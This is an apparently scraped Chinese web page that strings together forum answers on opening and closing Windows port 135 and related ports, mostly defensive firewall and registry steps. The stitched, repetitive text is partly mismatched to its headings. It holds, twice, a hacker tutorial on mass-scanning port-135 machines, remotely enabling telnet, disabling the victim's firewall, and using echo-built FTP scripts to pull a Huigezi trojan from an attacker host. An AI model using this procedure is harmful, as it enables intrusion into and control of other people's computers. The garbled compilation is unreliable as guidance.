win10关闭135端口

win10的135端口如何开启

1.如何打开135端口?

在介绍各种端口的作用前，这里先介绍一下在Windows中如何关闭/打开端口，因为默认的情况下，有很多不安全的或没有什么用的端口是开启的，比如Telnet服务的23端口、FTP服务的21端口、SMTP服务的25端口、RPC服务的135端口等等。

为了保证系统的安全性，我们可以通过下面的方法来关闭/开启端口。关闭端口比如在Windows 2000/XP中关闭SMTP服务的25端口，可以这样做：首先打开“控制面板”，双击“管理工具”，再双击“服务”。

接着在打开的服务窗口中找到并双击“Simple Mail Transfer Protocol (SMTP)”服务，单击“停止”按钮来停止该服务，然后在“启动类型”中选择“已禁用”，最后单击“确定”按钮即可。这样，关闭了SMTP服务就相当于关闭了对应的端口。

开启端口如果要开启该端口只要先在“启动类型”选择“自动”，单击“确定”按钮，再打开该服务，在“服务状态”中单击“启动”按钮即可启用该端口，最后，单击“确定”按钮即可。提示：在Windows 98中没有“服务”选项，你可以使用防火墙的规则设置功能来关闭/开启端口。

常见网络端口 21端口端口说明：21端口主要用于FTP(File Transfer Protocol，文件传输协议)服务，FTP服务主要是为了在两台计算机之间实现文件的上传与下载，一台计算机作为FTP客户端，另一台计算机作为FTP服务器，可以采用匿名（anonymous）登录和授权用户名与密码登录两种方式登录FTP服务器。目前，通过FTP服务来实现文件的传输是互联网上上传、下载文件最主要的方法。

另外，还有一个20端口是用于FTP数据传输的默认端口号。作者： 222.83.180.* 2005-6-15 05:12 回复此发言 17 接上在Windows中可以通过Internet信息服务（IIS）来提供FTP连接和管理，也可以单独安装FTP服务器软件来实现FTP功能，比如常见的FTP Serv-U。

操作建议：因为有的FTP服务器可以通过匿名登录，所以常常会被黑客利用。另外，21端口还会被一些木马利用，比如Blade Runner、FTP Trojan、Doly Trojan、WebEx等等。

如果不架设FTP服务器，建议关闭21端口。 23端口端口说明：23端口主要用于Telnet（远程登录）服务，是Internet上普遍采用的登录和仿真程序。

同样需要设置客户端和服务器端，开启Telnet服务的客户端就可以登录远程Telnet服务器，采用授权用户名和密码登录。登录之后，允许用户使用命令提示符窗口进行相应的操作。

在Windows中可以在命令提示符窗口中，键入“Telnet”命令来使用Telnet远程登录。操作建议：利用Telnet服务，黑客可以搜索远程登录Unix的服务，扫描操作系统的类型。

而且在Windows 2000中Telnet服务存在多个严重的漏洞，比如提升权限、拒绝服务等，可以让远程服务器崩溃。Telnet服务的23端口也是TTS(Tiny Telnet Server)木马的缺省端口。

所以，建议关闭23端口。 25端口端口说明：25端口为SMTP(Simple Mail Transfer Protocol，简单邮件传输协议)服务器所开放，主要用于发送邮件，如今绝大多数邮件服务器都使用该协议。

比如我们在使用电子邮件客户端程序的时候，在创建账户时会要求输入SMTP服务器地址，该服务器地址默认情况下使用的就是25端口端口漏洞： 1. 利用25端口，黑客可以寻找SMTP服务器，用来转发垃圾邮件。 2. 25端口被很多木马程序所开放，比如Ajan、Antigen、Email Password Sender、ProMail、trojan、Tapiras、Terminator、WinPC、WinSpy等等。

拿WinSpy来说，通过开放25端口，可以监视计算机正在运行的所有窗口和模块。操作建议：如果不是要架设SMTP邮件服务器，可以将该端口关闭。

53端口端口说明：53端口为DNS(Domain Name Server，域名服务器)服务器所开放，主要用于域名解析，DNS服务在NT系统中使用的最为广泛。通过DNS服务器可以实现域名与IP地址之间的转换，只要记住域名就可以快速访问网站。

端口漏洞：如果开放DNS服务，黑客可以通过分析DNS服务器而直接获取Web服务器等主机的IP地址，再利用53端口突破某些不稳定的防火墙，从而实施攻击。近日，美国一家公司也公布了10个最易遭黑客攻击的漏洞，其中第一位的就是DNS服务器的BIND漏洞。

操作建议：如果当前的计算机不是用于提供域名解析服务，建议关闭该端口。 67、68端口端口说明：67、68端口分别是为Bootp服务的Bootstrap Protocol Server（引导程序协议服务端）和Bootstrap Protocol Client（引导程序协议客户端）开放的端口。

Bootp服务是一种产生于早期Unix的远程启动协议，我们现在经常用到的DHCP服务就是从Bootp服务扩展而来的。通过Bootp服务可以为局域网中的计算机动态分配IP地址，而不需要每个用户去设置静态IP地址。

端口漏洞：如果开放Bootp服务，常常会被黑客利用分配的一个IP地址作为局部路由器通过“中间人”（man-in-middle）方式进行攻击。操作建议：建议关闭该端口。

端口说明：69端口是为TFTP(Trival File Tranfer Protocol，次要文件传输协议)服务开放的，TFTP是Cisco公司开发的一个简单文件传输协议，类似于FTP。不过与FTP相比，TFTP不具有复杂的交互存取接口和认证控制，该服务适。

2.如何开启自己的135网络端口?

电脑端口的开启和关闭：

一般情况下，Windows有很多端口是开放的，在你上网的时候，网络病毒和黑客可以通过这些端口连上你的电脑。

为了让你的系统变为铜墙铁壁，应该封闭这些端口，主要有：TCP 135、139、445、593、1025 端口

和UDP 135、137、138、445 端口，一些流行病毒的后门端口（如 TCP 2745、3127、6129 端口），

第一步，点击“开始”菜单/设置/控制面板/管理工具，双击打开“本地安全策略”，

选中“IP 安全策略，在本地计算机”，在右边窗格的空白位置右击鼠标，弹出快捷菜单，

选择“创建 IP 安全策略”（如右图），于是弹出一个向导。在向导中点击“下一步”按钮，

为新的安全策略命名；再按“下一步”，则显示“安全通信请求”画面，在画面上把

“激活默认相应规则”左边的钩去掉，点击“完成”按钮就创建了一个新的IP 安全策略。

第二步，右击该IP安全策略，在“属性”对话框中，把“使用添加向导”左边的钩去掉，

然后单击“添加”按钮添加新的规则，随后弹出“新规则属性”对话框，在画面上点击“添加”按钮，

弹出IP筛选器列表窗口；在列表中，首先把“使用添加向导”左边的钩去掉，然后再点击右边的“添加”按钮添加新的筛选器。

第三步，进入“筛选器属性”对话框，首先看到的是寻址，源地址选“任何 IP 地址”，

目标地址选“我的 IP 地址”；点击“协议”选项卡，在“选择协议类型”的下拉列表中选择“TCP”,

然后在“到此端口”下的文本框中输入“135”，点击“确定”按钮（如左图），这样就添加了一个

屏蔽TCP 135(RPC)端口的筛选器，它可以防止外界通过135端口连上你的电脑。

点击“确定”后回到筛选器列表的对话框，可以看到已经添加了一条策略，

重复以上步骤继续添加 TCP 137、139、445、593 端口和 UDP 135、139、445 端口，为它们建立相应的筛选器。

重复以上步骤添加TCP 1025、2745、3127、6129、3389 端口的屏蔽策略，建立好上述端口的筛选器，最后点击“确定”按钮。

第四步，在“新规则属性”对话框中，选择“新 IP 筛选器列表”，然后点击其左边的圆圈上加一个点，

表示已经激活，最后点击“筛选器操作”选项卡。在“筛选器操作”选项卡中，把“使用添加向导”左边的钩去掉，

点击“添加”按钮，添加“阻止”操作（右图）：在“新筛选器操作属性”的“安全措施”选项卡中，选择“阻止”，

然后点击“确定”按钮。

第五步、进入“新规则属性”对话框，点击“新筛选器操作”，其左边的圆圈会加了一个点，表示已经激活，

点击“关闭”按钮，关闭对话框；最后回到“新IP安全策略属性”对话框，在“新的IP筛选器列表”左边打钩，

按“确定”按钮关闭对话框。在“本地安全策略”窗口，用鼠标右击新添加的 IP 安全策略，然后选择“指派”。

于是重新启动后，电脑中上述网络端口就被关闭了，病毒和黑客再也不能连上这些端口，从而保护了你的电脑。

3.如何开135端口

开启RPC服务

由于通过135网络端口，只能远程运行一些通过DCOM技术开发出来的应用程序，而DCOM技术在通信过程中，需要用到RPC服务；因此如果将服务器中的RPC服务启用的话，就能达到开启135网络端口的目的了。在启用RPC服务时，可以依次单击"开始"/"程序"/"管理工具"/"服务"命令，在随后打开的"服务"列表中，双击其中的"Remote Procedure Call"选项，打开如图1所示的设置界面，将该界面的启动类型设置为"自动"选项，再单击一下"应用"按钮，再单击界面的服务状态"启动"选项，单击一下"确定"按钮，服务器的RPC服务就会被启用了。

4.如何开启135端口

大家好我是小毛，好多朋友问我申请不到FTP空间怎么给135肉鸡种马，所以今天给大家讲的是更快更准的抓135肉鸡，呵注：本教程只适合新手看，老鸟们就不必看了哈，小鸟蛋我说的有什么不对，还请大家多多指导好了下面介绍下需要用到的工具 Serv-U（在本机建立FTP） NTscan(135扫描工具) Recton（远程开23端口） EvID4226Patch(XP线程修改工具) 灰鸽子木马一个 OK 上面的工具准备好后我们就可以开工了``~~》》》》》》》》》》》》》》》》》》》》》》》首先给大家介绍下如何使用Serv-U 看操作····· OK FTP好了后就把自己的木马放在你的FTP里吧下面我们打开EvID4226Patch（这是个以外收获，本是用打来使用S.EXE的，没想到也加速了NTscan） EvID4226Patch设置的顺序依次为 C 1000回车 Y 在8秒左右会出现文件保护，大家点取消就OK了下面我们打开NTscan扫135（个人觉得先看下自己的IP，然后扫描自己IP很近的IP，速度快效果佳）看操作···· 58.241.227.242 慢````正在连接 58.241.227.242 。

连接成功！正在检查Telnet服务状态。

Telnet服务已被禁止！正在改变启动类型为 Manual（手动）。

正在改变服务状态。

正在设置 NTLM=0 。

正在设置端口=23 。

Telnet服务已经成功打开！端口：23 . 好了已经扫到好多了然后用Recton开它的23端口好了咱可以去telnet了````~ 下面就是给它上个马这下就要用到 Serv-U了启动FTP~~ （如怕有失误可在浏览器里输入ftp：//自己的IP） telnet上去后咱要给它种马啊，要不进来干嘛对不````呵呵找个安全的地方传面的人家断开的时候你的FTP帐号和密码还在上面呢```` 命令： echo open 58.241.227.58>>zxq.txt 登陆地址 echo zxq>>zxq.txt 用户名 echo 123456>>zxq.txt 密码 echo bin>>zxq.txt 开始登陆 echo get 135.exe>>zxq.txt 下载木马 echo bye>>zxq.txt 退出登陆============================================================================================ （#以上命令会在在对方的电脑里形成一个zxq.txt的文本，文本里具体什么内容我就不多说了自己实验吧#）=========================================================================================== net stop sharedaccess 关闭防火墙 ftp -s:zxq.txt 运行zxq.txt脚本参数收到 1507840 字节 135.exe (1507840 Bytes). 好了咱dir下看看下载文件的大小是不是和你木马文件的大小一致，如不同，说明你的马给杀了怎么办？（一可以用Recton关它的杀毒软件二让自己的木马面杀三放弃）。

打错命令了呼``` - -！！运行木马程序然后就 del zxq.txt 删除zxq.txt 晕还在上面闷``` 在运行试试``` 哈哈没了 exit 退出telnet 好了等着可爱的鸡鸡上线吧````~~ 上线了，看看他干什么了````` 呼和我一样的桌面我还以为我自己入侵自己呢闷。

5.135端口怎么开

135端口

端口说明c-serv MS RPC end-point mapper Microsoft在这个端口运行DCE

RPC end-point mapper为它的DCOM服务。这与UNIX 111 端口的功

能很相似。使用DCOM和/或RPC的服务利用机器上的end-point mapper

注册它们的位置。远端客户连接到机器时，它们查询end-point

mapper找到服务的位置。同样Hacker扫描机器的这个端口是为了找到

诸如：这个机器上运行ExchangeServer吗？是什么版本？

关闭方法：用一款16为编辑软件（推荐UltraEdit）打开你系统

winnt\system32 或者 x:\windows\system32下的rpcss.dll文件。

查找31 00 33 00 35

替换为30 00 30 00 30

查找3100330035，将其替换为3000300030，意思就是将135端口

改为000。至此修改的任务已经完成，下面将面临一个保存的问题。

因为该文件正在运行，在Windows环境下是不能覆盖的。如果你是

FAT32文件系统，那么直接引导进DOS环境，将修改好的文件覆盖掉

原来的文件。

如果是NTFS格式，相对就麻烦一些。进安全模式。然后启动pulist列

出进程，然后用pskill这个程序（黑客网站有下的）杀掉svchost.exe

程序。然后在COPY过去。

覆盖后重新启动，使用netstat -an命令，可以看到Windows 2000下

已经没有135端口了。XP系统还有TCP的135，但是UDP里面已经没有

135端口了。

看看！可以不？

6.怎样打开135端口

Windows XP系统

运行dcomcnfg，展开“组件服务”→“计算机”，在“我的电脑”上点右键选“属性”，切换到“默认属性”，取消“启用分布式COM”；然后切换到“默认协议”，删除“面向连接的TCP/IP”。

以上选项有对应的注册表键值，因此也可通过注册表来修改：

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Ole\EnableDCOM的值改为“N”

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Rpc\DCOM Protocols 中删除“ncacn_ip_tcp”

此外，还需要停用“Distributed Transaction Coordinator”服务。

重启之后， 135端口就没有了。

Windows 2000系统

前面的步骤和在XP下相同，只是需要多停用一个服务，“Task Scheduler”注意dcomcnfg的界面稍有不同，不过内容是一样的。

Windows 2003

以上方法在2003下无效，目前我只找到一个折中的方法。默认情况下，135端口是在所有地址上监听的，如果只在本机回环地址上监听，也不失为一种解决办法。要想改变135监听的地址，需要Windows Server 2003 Resource Kit tools中的rpccfg.exe。

首先看一下网卡上都有哪些网段：rpccfg -l，一般情况下输出如下：

1 127.0.0.0 1 MS TCP Loopback interface

2 192.168.0.0 1 Realtek RTL8139/810x Family Fast Ethernet NIC

然后输入；rpccfg -a 1。这样只有本机回环地址才开放135端口。

^-^

7.请问怎么打开自己电脑的135端口

其实是服务TCP/IP NetBIOS Helper被关了，在--开始--运行--services.msc--找到TCP/IP NetBIOS Helper开启就可以了.

PS:135端口开放实际上是一个WINNT漏洞，开放的135的端口情况容易引起自外部的"Snork"攻击！！！

对于135端口开放的问题，可以在你的防火墙上，增加一条规则：拒绝所有的这类进入的UDP包，目的端口是135，源端口是7,19，或者135，这样可以保护内部的系统，防止来自外部的攻击。大多数防火墙或者包过滤器已经设置了很多严格的规则，已覆盖了这条过滤规则，但任需注意：有一些NT的应用程序，它们依靠UDP135端口进行合法的通讯，而打开你135的端口与NT的RPC服务进行通讯。如果真是这样，你一定要在那些原始地址的系统上（需要135口通讯），实施上述的规则，指定来自这些系统的通讯可以通过防火墙，或者，可以被攻击检测系统所忽略，以便维持那些应用程序的正常连接。

win10的135端口如何开启

win10的135端口如何打开

1.如何打开135端口?

如果不架设FTP服务器，建议关闭21端口。 23端口端口说明：23端口主要用于Telnet（远程登录）服务，是Internet上普遍采用的登录和仿真程序。

拿WinSpy来说，通过开放25端口，可以监视计算机正在运行的所有窗口和模块。操作建议：如果不是要架设SMTP邮件服务器，可以将该端口关闭。

2.如何开启135端口

连接成功！正在检查Telnet服务状态。

Telnet服务已被禁止！正在改变启动类型为 Manual（手动）。

正在改变服务状态。

正在设置 NTLM=0 。

正在设置端口=23 。

3.请问怎么打开自己电脑的135端口

其实是服务TCP/IP NetBIOS Helper被关了，在--开始--运行--services.msc--找到TCP/IP NetBIOS Helper开启就可以了.PS:135端口开放实际上是一个WINNT漏洞，开放的135的端口情况容易引起自外部的"Snork"攻击！！！

4.怎样打开135端口

Windows XP系统运行dcomcnfg，展开“组件服务”→“计算机”，在“我的电脑”上点右键选“属性”，切换到“默认属性”，取消“启用分布式COM”；然后切换到“默认协议”，删除“面向连接的TCP/IP”。

以上选项有对应的注册表键值，因此也可通过注册表来修改： HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Ole\EnableDCOM的值改为“N” HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Rpc\DCOM Protocols 中删除“ncacn_ip_tcp” 此外，还需要停用“Distributed Transaction Coordinator”服务。重启之后， 135端口就没有了。

Windows 2000系统前面的步骤和在XP下相同，只是需要多停用一个服务，“Task Scheduler”注意dcomcnfg的界面稍有不同，不过内容是一样的。 Windows 2003 以上方法在2003下无效，目前我只找到一个折中的方法。

默认情况下，135端口是在所有地址上监听的，如果只在本机回环地址上监听，也不失为一种解决办法。要想改变135监听的地址，需要Windows Server 2003 Resource Kit tools中的rpccfg.exe。

首先看一下网卡上都有哪些网段：rpccfg -l，一般情况下输出如下： 1 127.0.0.0 1 MS TCP Loopback interface 2 192.168.0.0 1 Realtek RTL8139/810x Family Fast Ethernet NIC 然后输入；rpccfg -a 1。这样只有本机回环地址才开放135端口。

^-^。

5.如何开启自己的135网络端口

大家好我是小毛，好多朋友问我申请不到ftp空间怎么给135肉鸡种马，所以今天给大家讲的是更快更准的抓135肉鸡，呵注：本教程只适合新手看，老鸟们就不必看了哈，小鸟蛋我说的有什么不对，还请大家多多指导好了下面介绍下需要用到的工具 serv-u（在本机建立ftp） ntscan(135扫描工具) recton（远程开23端口） evid4226patch(xp线程修改工具) 灰鸽子木马一个 ok 上面的工具准备好后我们就可以开工了``~~ 》》》》》》》》》》》》》》》》》》》》》》》首先给大家介绍下如何使用serv-u 看操作····· ok ftp好了后就把自己的木马放在你的ftp里吧下面我们打开evid4226patch（这是个以外收获，本是用打来使用s.exe的，没想到也加速了ntscan） evid4226patch设置的顺序依次为 c 1000回车 y 在8秒左右会出现文件保护，大家点取消就ok了下面我们打开ntscan扫135（个人觉得先看下自己的ip，然后扫描自己ip很近的ip，速度快效果佳）看操作···· 58.241.227.242 慢```` 正在连接 58.241.227.242 。

连接成功！正在检查telnet服务状态。

telnet服务已被禁止！正在改变启动类型为 manual（手动）。

正在改变服务状态。

正在设置 ntlm=0 。

正在设置端口=23 。

telnet服务已经成功打开！端口：23 . 好了已经扫到好多了然后用recton开它的23端口好了咱可以去telnet了````~ 下面就是给它上个马这下就要用到 serv-u了启动ftp~~ （如怕有失误可在浏览器里输入ftp：//自己的ip） telnet上去后咱要给它种马啊，要不进来干嘛对不````呵呵找个安全的地方传面的人家断开的时候你的ftp帐号和密码还在上面呢```` 命令： echo open 58.241.227.58>>zxq.txt 登陆地址 echo zxq>>zxq.txt 用户名 echo 123456>>zxq.txt 密码 echo bin>>zxq.txt 开始登陆 echo get 135.exe>>zxq.txt 下载木马 echo bye>>zxq.txt 退出登陆 ============================================================================================ （#以上命令会在在对方的电脑里形成一个zxq.txt的文本，文本里具体什么内容我就不多说了自己实验吧#） =========================================================================================== net stop sharedaccess 关闭防火墙 ftp -s:zxq.txt 运行zxq.txt脚本参数收到 1507840 字节 135.exe (1507840 bytes). 好了咱dir下看看下载文件的大小是不是和你木马文件的大小一致，如不同，说明你的马给杀了怎么办？（一可以用recton关它的杀毒软件二让自己的木马面杀三放弃）。

6.请问135,445端口在哪里打开.具体点.对应服务是什么

Windows2000的445端口

概要：

在windows2000中出现了一个以前没有用过的端口455。

概念：

SMB(Server Message Block)

Windows协议族，用于文件和打印共享服务。

NBT(NetBIOS over TCP/IP)

使用137, 138 (UDP) and 139 (TCP)来实现基于TCP/IP的NETBIOS网际互联。

内容：

在Windows NT中SMB基于NBT实现。

而在Windows2000中，SMB除了基于NBT的实现，还有直接通过445端口实现。

当Win2000（允许NBT）作为client来连接SMB服务器时，它会同时尝试连接139和445端口，如果445端口有响应，那么就发送RST包给139端口断开连接，以455端口通讯来继续.当445端口无响应时，才使用139端口。

当Win2000（禁止NBT）作为client来连接SMB服务器时，那么它只会尝试连接445端口，如果无响应，那么连接失败。（注意可能对方是NT4.0服务器。）

如果win2000服务器允许NBT，那么UDP端口137, 138, TCP 端口 139, 445将开放。

如果 NBT 被禁止，那么只有445端口开放.

好了，如果我们在win2000上运行一些工具利用null session列举出对方机器的一些有用资料时，应该把我们机器上的NBT设为允许。

7.135端口怎么开

135端口

端口说明c-serv MS RPC end-point mapper Microsoft在这个端口运行DCE

RPC end-point mapper为它的DCOM服务。这与UNIX 111 端口的功

能很相似。使用DCOM和/或RPC的服务利用机器上的end-point mapper

注册它们的位置。远端客户连接到机器时，它们查询end-point

mapper找到服务的位置。同样Hacker扫描机器的这个端口是为了找到

诸如：这个机器上运行ExchangeServer吗？是什么版本？

关闭方法：用一款16为编辑软件（推荐UltraEdit）打开你系统

winnt\system32 或者 x:\windows\system32下的rpcss.dll文件。

查找31 00 33 00 35

替换为30 00 30 00 30

查找3100330035，将其替换为3000300030，意思就是将135端口

改为000。至此修改的任务已经完成，下面将面临一个保存的问题。

因为该文件正在运行，在Windows环境下是不能覆盖的。如果你是

FAT32文件系统，那么直接引导进DOS环境，将修改好的文件覆盖掉

原来的文件。

如果是NTFS格式，相对就麻烦一些。进安全模式。然后启动pulist列

出进程，然后用pskill这个程序（黑客网站有下的）杀掉svchost.exe

程序。然后在COPY过去。

覆盖后重新启动，使用netstat -an命令，可以看到Windows 2000下

已经没有135端口了。XP系统还有TCP的135，但是UDP里面已经没有

135端口了。

看看！可以不？

8.如何开135端口

开启RPC服务

win10的135端口如何打开

win10怎么关135端口

1.win 10如何关闭135端口,我要的不是win xp,win 7,win 8的方法,而是

win7系统关闭135、445等端口的步骤：1、点开始——控制面板；

2、点系统和安全；

3、点管理工具；

4、点本地安全策略；

5、选择【IP安全策略，在本地计算机】，鼠标右键选择创建IP安全策略；

6、输入IP安全策略名称，点下一步；

7、点下一步；

8、点完成；

9、将【使用“添加向导”】前的勾去掉，点添加；

10、点添加；

11、将【使用“添加向导”】前的勾去掉，点添加；

12、源地址：选择【任何IP地址】；

目标地址：选择【我的IP地址】，点确定；

13、选择协议选项卡，135端口：协议类型选择TCP，到此端口输入135;

445端口：协议类型选择UDP，，到此端口输入445，点确定；

14、返回到IP筛选器列表，点击确定；

15、此时IP筛选器列表下会多出一个列表，选中它，点应用；

16、切换到筛选器操作选项卡，将【使用“添加向导”】前的勾去掉，点添加；

17、选中阻止，点确定；

18、此时筛选器操作下会多出一个列表，选中它，点应用，点确定；

19、点应用，点确定；

20、选中刚创建的IP安全策略，鼠标右键选择分配。

2.如何关闭windows 10 的135 137 139 445等危险端口

关闭135 1、运行输入“dcomcnfg”

2、在“计算机”选项右边，右键单击“我的电脑”，选择“属性”。

3、在出现的“我的电脑属性”对话框“默认属性”选项卡中，去掉“在此计算机上启用分布式COM”前的勾。

4、选择“默认协议”选项卡，选中“面向连接的TCP/IP”，单击“删除”按钮

关闭136137138端口

在网络邻居上点右键选属性，在新建好的连接上点右键选属性再选择网络选项卡，去掉Microsoft网络的文件和打印机共享，和Microsoft网络客户端的复选框。这样就关闭了共享端137和138还有136端口

关闭139端口：139端口是NetBIOS Session端口，用来文件和打印共享，注意的是运行samba的unix机器也开放了139端口，功能一样。关闭139口听方法是在“网络和拨号连接”中“本地连接”中选取“Internet协议（TCP/IP）”属性，进入“高级TCP/IP设置”“WINS设置”里面有一项“禁用TCP/IP的 NETBIOS”，打勾就关闭了139端口

关闭445端口：开始-运行输入regedit.确定后定位到

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Servi ces\NetBT\Parameters，新建名为“SMBDeviceEnabled”的DWORD值，并将其设置为0

3.如何关闭windows 10 的135 137 139 445等危险端口

关闭135 1、运行输入“dcomcnfg”2、在“计算机”选项右边，右键单击“我的电脑”，选择“属性”。

3、在出现的“我的电脑属性”对话框“默认属性”选项卡中，去掉“在此计算机上启用分布式COM”前的勾。4、选择“默认协议”选项卡，选中“面向连接的TCP/IP”，单击“删除”按钮关闭136137138端口在网络邻居上点右键选属性，在新建好的连接上点右键选属性再选择网络选项卡，去掉Microsoft网络的文件和打印机共享，和Microsoft网络客户端的复选框。

这样就关闭了共享端137和138还有136端口关闭139端口：139端口是NetBIOS Session端口，用来文件和打印共享，注意的是运行samba的unix机器也开放了139端口，功能一样。关闭139口听方法是在“网络和拨号连接”中“本地连接”中选取“Internet协议（TCP/IP）”属性，进入“高级TCP/IP设置”“WINS设置”里面有一项“禁用TCP/IP的 NETBIOS”，打勾就关闭了139端口关闭445端口：开始-运行输入regedit.确定后定位到HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Servi ces\NetBT\Parameters，新建名为“SMBDeviceEnabled”的DWORD值，并将其设置为0。

4.win10怎么关闭udp135

如图所示，打开电脑的控制面板，选择系统和安全，进入windows防火墙，在放火墙页面左侧的选项卡中选择高级设置。

进入高级设置页面，在页面左侧的选项卡中选择入站规则，点击进入。

进入入站规则页面后，选择页面右侧选项中的新建规则，图中红色圆圈位置。

在弹出的新建入站规则向导页面中，在“要创建的规则类型”选项中选择“端口”项，然后点击下一步进入下一个页面。

在新页面选项中选择“特定的本地端口”，输入135和445两个端口，中间用逗号隔开。至于TCP和UDP，两个协议都需要封闭，但不能同时进行，先选择TCP协议。设置完成后点击“下一步”进入下个页面。

在接下来的页面中选择“阻止连接”项，点击下一步。

在“何时应用该规则”选项中全选，进入下一步。

5.如何用命令关闭135端口

关闭445端口后是无法使用共享服务的

网络安全专家建议，用户要断网开机，即先拔掉网线再开机，这样基本可以避免被勒索软件感染。开机后应尽快想办法打上安全补丁，或安装各家网络安全公司针对此事推出的防御工具，才可以联网。建议尽快备份电脑中的重要文件资料到移动硬盘、U 盘，备份完后脱机保存该磁盘，同时对于不明链接、文件和邮件要提高警惕，加强防范。

临时解决方案：

1、开启系统防火墙

2、利用系统防火墙高级设置阻止向445端口进行连接（该操作会影响使用445端口的服务）

3、打开系统自动更新，并检测更新进行安装

Win7、Win8、Win10的处理流程

1、打开控制面板-系统与安全-Windows防火墙，点击左侧启动或关闭Windows防火墙。

2、选择启动防火墙，并点击确定

3、点击高级设置

4、点击入站规则，新建规则

5、选择端口，下一步

6、特定本地端口，输入445，下一步

7、选择阻止连接，下一步

8、配置文件，全选，下一步

9、名称，可以任意输入，完成即可。

XP系统的处理流程

1、依次打开控制面板，安全中心，Windows防火墙，选择启用

2、点击开始，运行，输入cmd，确定执行下面三条命令：net stop rdr 、net stop srv 、net stop netbt

6.如何关闭135端口

135端口主要用于使用RPC(Remote Procedure Call，远程过程调用)协议并提供DCOM（分布式组件对象模型）服务。

端口说明：135端口主要用于使用RPC(Remote Procedure Call，远程过程调用)协议并提供DCOM（分布式组件对象模型）服务，通过RPC可以保证在一台计算机上运行的程序可以顺利地执行远程计算机上的代码；使用DCOM可以通过网络直接进行通信，能够跨包括HTTP协议在内的多种网络传输。

端口漏洞：相信去年很多Windows 2000和Windows XP用户都中了“冲击波”病毒，该病毒就是利用RPC漏洞来攻击计算机的。RPC本身在处理通过TCP/IP的消息交换部分有一个漏洞，该漏洞是由于错误地处理格式不正确的消息造成的。该漏洞会影响到RPC与DCOM之间的一个接口，该接口侦听的端口就是135。

操作建议：为了避免“冲击波”病毒的攻击，建议关闭该端口。

关闭135端口

一、单击“开始”——“运行”，输入“dcomcnfg”，单击“确定”，打开组件服务。

二、在弹出的“组件服务”对话框中，选择“计算机”选项。

三、在“计算机”选项右边，右键单击“我的电脑”，选择“属性”。

四、在出现的“我的电脑属性”对话框“默认属性”选项卡中，去掉“在此计算机上启用分布式COM”前的勾。

五、选择“默认协议”选项卡，选中“面向连接的TCP/IP”，单击“删除”按钮。

六、单击“确定”按钮，设置完成，重新启动后即可关闭135端口。

7.怎么彻底关掉135端口

通用篇（适用系统Win2000/XP/server2003），最近我在论坛看了一些文章，发现大家都有一个误区，就是哪个端口出漏洞就关闭哪个端口，其实这样是不能保证系统安全的，正确的方法应该是先了解清楚自己需要开放哪些端口，了解完毕后，把自己不需要的端口统统关闭掉，这样才能保证系统的安全性。

比如说你的电脑是一台服务器，服务器需要有Mail Server和WEB服务，还要有FTP服务，这些只需要开放21、25、80、110就足够了。其它的就应该全部关闭。

关闭的方法：点击“开始→控制面板→网络连接→本地连接→右键→属性”，然后选择“Internet(tcp/ip)”→“属性”，。在“Internet(tcp/ip)属性”对话框中选择“高级”选项卡。

在“高级TCP/IP设置”对话框中点选“选项”→“TCP/IP筛选”→“属性”，。在这里分为3项，分别是TCP、UDP、IP协议。

假设我的系统只想开放21、80、25、110这4个端口，只要在“TCP端口”上勾选“只允许”然后点击“添加”依次把这些端口添加到里面，然后确定。注意：修改完以后系统会提示重新启动，这样设置才会生效。

这样，系统重新启动以后只会开放刚才你所选的那些端口，其它端口都不会开放。 2.利用系统自带防火墙关闭端口（适用系统WinXP/Server 2003）微软推出WinXP之后的操作系统本身都自带防火墙，用它就可以关闭掉不需要的端口，实现的步骤也很简单。

具体设置：“控制面板”→“本地连接”→“高级”，把“Inernet连接防火墙”下面的选项勾选上，如图所示，然后点击“设置”，出现如图所示窗口。假设我们要关闭135端口（所有使用Win2000或者是WinXP的用户马上关闭135端口，因为最新的漏洞可以利用这个端口攻击服务器获取权限），135端口用于启动与远程计算机的RPC连接。

我们可以在“高级设置”窗口的“服务”选项卡中点击“添加”按钮，。在“服务设置”对话框中把各项按图中所示填写好之后一路确定就可以了。

这样防火墙就自动启动了，启动以后“本地连接”图标会出现一个可爱的小锁头。以上就是利用系统本身自带防火墙关闭端口的方法。

当然了，有条件的朋友还可以使用第三方防火墙来关闭端口。

win10怎么关135端口